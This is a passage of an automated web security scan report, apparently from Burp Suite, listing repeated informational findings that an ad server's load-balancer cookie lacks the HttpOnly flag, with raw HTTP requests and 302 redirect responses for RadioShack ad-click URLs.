Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

11.250. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_160;RS_SELL_2011Q1_AOL_CPA_160;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/160:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567? HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=;ord=394936567?
Content-Length: 568
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
